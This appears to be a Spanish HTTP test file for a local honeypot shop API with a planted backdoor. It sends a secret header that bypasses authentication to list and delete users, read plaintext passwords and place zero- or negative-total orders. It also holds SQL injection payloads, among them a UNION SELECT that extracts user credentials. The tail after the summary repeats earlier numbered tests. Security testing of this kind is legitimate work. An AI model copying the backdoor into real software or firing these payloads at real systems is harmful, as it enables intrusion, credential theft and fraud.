### ==============================================
### 🚪 HONEYPOT - BACKDOOR TESTS
### ==============================================

@baseUrl = http://localhost:3000
@apiUrl = http://localhost:3000/api

### =====================================================
### BACKDOOR - ACCESS WITHOUT AUTHENTICATION
### =====================================================

### 1. Test Backdoor - Get All Users (SIN token JWT)
GET {{apiUrl}}/admin/users
X-AccessDev: Testing-Mode

### 2. Test Backdoor - Get Database Stats (SIN token JWT)
GET {{apiUrl}}/admin/stats
X-AccessDev: Testing-Mode

### 3. Test Backdoor - Get Audit Logs (SIN token JWT)
GET {{apiUrl}}/admin/audit-logs?limit=10
X-AccessDev: Testing-Mode

### 4. Test Backdoor - Get Audit Logs (últimos 50)
GET {{apiUrl}}/admin/audit-logs?limit=50
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - INTENTAR CON VALORES INCORRECTOS
### =====================================================

### 5. Test con header incorrecto (debería fallar)
GET {{apiUrl}}/admin/users
X-AccessDev: WrongValue

### 6. Test con header diferente nombre (debería fallar)
GET {{apiUrl}}/admin/users
X-Developer: Testing-Mode

### 7. Test con valor similar pero incorrecto (debería fallar)
GET {{apiUrl}}/admin/users
X-AccessDev: testing-mode

### 8. Test sin header (debería fallar - 401)
GET {{apiUrl}}/admin/users

### =====================================================
### BACKDOOR - OPERACIONES PELIGROSAS
### =====================================================

### 9. Backdoor - Eliminar usuario ID 6 (guest)
### ⚠️ CUIDADO: Esto elimina permanentemente el usuario
DELETE {{apiUrl}}/admin/users/6
X-AccessDev: Testing-Mode

### 10. Backdoor - Intentar eliminar admin (ID 1)
### ⚠️ PELIGROSO: No hacer si necesitas el usuario admin
# DELETE {{apiUrl}}/admin/users/1
# X-AccessDev: Testing-Mode

### =====================================================
### VERIFICAR QUE BACKDOOR SE REGISTRA EN LOGS
### =====================================================

### 11. Verificar logs de backdoor - Buscar entradas 'backdoor_access'
GET {{apiUrl}}/admin/audit-logs?limit=20
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - COMBINADO CON OTRAS TÉCNICAS
### =====================================================

### 12. Backdoor + Login normal (redundante pero válido)
POST {{apiUrl}}/auth/login
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "username": "admin",
  "password": "admin"
}

### 13. Backdoor en Profile endpoint (debería funcionar sin token)
GET {{apiUrl}}/auth/profile
X-AccessDev: Testing-Mode

### =====================================================
### TESTS DE FUZZING DEL BACKDOOR
### =====================================================

### 14. Case sensitivity - MAYÚSCULAS
GET {{apiUrl}}/admin/users
X-ACCESSDEV: Testing-Mode

### 15. Case sensitivity - minúsculas
GET {{apiUrl}}/admin/users
x-accessdev: Testing-Mode

### 16. Valor con espacios extras
GET {{apiUrl}}/admin/users
X-AccessDev:  Testing-Mode  

### 17. Header con tabs
GET {{apiUrl}}/admin/users
X-AccessDev:	Testing-Mode

### 18. Multiple backdoor headers
GET {{apiUrl}}/admin/users
X-AccessDev: Testing-Mode
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR EN PEDIDOS (VULNERABILIDAD REAL)
### =====================================================
### ⚠️ NOTA: Los precios de productos están protegidos ($15000 mínimo)
### La vulnerabilidad REAL está en los PEDIDOS con total $0
### Requiere header X-AccessDev para bypass de autenticación
### =====================================================

### 19. Backdoor - Crear pedido con total $0 (¡PRODUCTOS GRATIS!)
POST {{apiUrl}}/orders
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "items": [
    {
      "productId": 1,
      "nombre": "Sofa Patagonia",
      "precio": 89999.99,
      "quantity": 3
    },
    {
      "productId": 5,
      "nombre": "Mesa Comedor Pampa",
      "precio": 65000.00,
      "quantity": 2
    }
  ],
  "total": 0,
  "shipping_address": "Backdoor Street 666"
}

### 20. Backdoor - Pedido con total negativo (¡TE PAGAN!)
POST {{apiUrl}}/orders
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "items": [
    {
      "productId": 8,
      "nombre": "Cama Neuquen",
      "precio": 78500.00,
      "quantity": 1
    }
  ],
  "total": -50000,
  "shipping_address": "Negative Price Avenue"
}

### 21. Backdoor - Ver todos los pedidos sin autenticación
GET {{apiUrl}}/orders
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - MODIFICACIÓN DE PEDIDOS
### =====================================================

### 22. Backdoor - Modificar total de pedido existente a $0
PUT {{apiUrl}}/orders/1
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "total": 0,
  "status": "completed"
}

### 23. Backdoor + SQLi - Ver todos los pedidos
GET {{apiUrl}}/orders/1' OR '1'='1
X-AccessDev: Testing-Mode

### 24. Backdoor + SQLi - Extraer usuarios desde pedidos
GET {{apiUrl}}/orders/1' UNION SELECT id,username,email,password,role,1,1,NOW(),NOW() FROM users WHERE '1'='1
X-AccessDev: Testing-Mode

### 25. Backdoor - Eliminar pedidos con SQLi
DELETE {{apiUrl}}/orders/1' OR '1'='1
Content-Type: application/json
X-AccessDev: Testing-Mode

### =====================================================
### RESUMEN DE BACKDOOR
### =====================================================
###
### Header Secreto: X-AccessDev: Testing-Mode
### 
### ✅ Funciona en:
### - GET /api/admin/users
### - GET /api/admin/stats  
### - GET /api/admin/audit-logs
### - DELETE /api/admin/users/:id
### - POST /api/orders (⚠️ VULNERABILIDAD REAL: total $0)
### - GET /api/orders
### - PUT /api/orders/:id (modificar total a $0)
### - DELETE /api/orders/:id
### - GET /api/auth/profile (con backdoor, sin token)
###
### ❌ NO funciona con:
### - Headers con nombre incorrecto
### - Valores case-sensitive incorrectos
### - Sin el header
###
### 🛡️ PROTEGIDO (Falsa vulnerabilidad):
### - Precios de productos: NO se pueden actualizar < $15000
### - POST/PUT /api/productos con precio bajo → Error 400
###
### 🚨 Impacto: CRÍTICO
### - Bypass completo de autenticación
### - Acceso a funciones administrativas
### - ⚠️ VULNERABILIDAD REAL: Crear pedidos con total $0
### - Modificar pedidos existentes a $0
### - Se registra en audit_log como 'backdoor_access'
###
### 💡 ESTRATEGIA:
### Los atacantes pueden PENSAR que pueden manipular precios de productos,
### pero la VERDADERA vulnerabilidad está en los PEDIDOS (total = $0).
### Esto requiere el header backdoor para bypass de autenticación.
###
### =====================================================
X-AccessDev:  Testing-Mode 

### 17. Valor truncado
GET {{apiUrl}}/admin/users
X-AccessDev: Testing

### 18. Multiple headers (intentar confundir)
GET {{apiUrl}}/admin/users
X-AccessDev: WrongValue
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - INFORMACIÓN SENSIBLE
### =====================================================

### 19. Ver TODAS las contraseñas en texto plano
GET {{apiUrl}}/admin/users
X-AccessDev: Testing-Mode

### 20. Estadísticas completas del sistema
GET {{apiUrl}}/admin/stats
X-AccessDev: Testing-Mode
